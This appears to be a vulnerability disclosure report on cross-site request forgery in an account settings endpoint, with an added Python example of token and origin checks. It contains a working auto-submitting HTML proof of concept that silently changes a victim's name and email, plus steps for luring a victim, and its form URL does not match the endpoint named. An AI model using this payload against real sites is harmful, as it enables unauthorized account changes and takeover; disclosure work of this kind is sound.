Description:
While working on the user settings option I noticed the site was sending a POST request, but there was no CSRF token or any auth token to confirm whether the request was sent by the current user or not, so I did not even wait before exploiting CSRF here.

The application endpoint:
https://app.canopy.us/?a=account/update_settings
is vulnerable to Cross-Site Request Forgery (CSRF).
The endpoint processes sensitive account updates without validating a CSRF token or verifying the request origin, allowing an attacker to trick a victim into performing unintended actions.
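The two checks the endpoint is missing, a session-bound synchronizer token plus an Origin/Referer allow-list, as an added defensive example that is not part of the original report or the application's own code. The secret, session id and header/form dicts are constructed for the example; the allowed origin is the host named in this report.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed secret for this example only; a real deployment loads it from configuration.
SERVER_SECRET = b"example-secret-do-not-use"
ALLOWED_ORIGINS = {"https://app.canopy.us"}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the victim's session via HMAC, embedded in the settings form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_is_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own site.
    A cross-site auto-submitted form carries the attacker page's origin, so it is refused;
    a request with neither header is refused too, since it cannot be attributed."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def update_settings_allowed(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for POST ?a=account/update_settings: both checks must pass before
    fName/lName/email are touched. The token is compared in constant time."""
    if not origin_is_allowed(headers):
        return False
    submitted = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(submitted, expected)
```

Marking the session cookie SameSite=Lax or Strict is a complementary browser-side control, but the server-side checks above are what make the endpoint safe on their own.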
I just created this code to exploit it:
Auto-Submit CSRF PoC
<html>
<body>
<script>
history.pushState('', '', '/');
</script>
<form id="csrf_form" action="https://app.us/?a=account/update_settings" method="POST">
<input type="hidden" name="fName" value="Attacker" />
<input type="hidden" name="lName" value="User" />
<input type="hidden" name="email" value="attacker@mail.com" />
</form>
<script>
document.getElementById("csrf_form").submit();
</script>
</body>
</html>

Steps to Reproduce
- Log in to the application as a legitimate user (victim)
- Save the PoC HTML file locally or host it on a server
- Ensure the victim is authenticated in the browser
- Open or send the PoC link to the victim
- The form auto-submits silently
- Observe that the victim’s account details are modified without consent

Impact
An attacker can exploit this vulnerability to:
- Modify victim profile details (name, email, etc.)
- Perform unauthorized actions on behalf of the victim
- Potentially achieve Account Takeover (if email change is critical)
- Chain with other attacks (e.g., password reset abuse)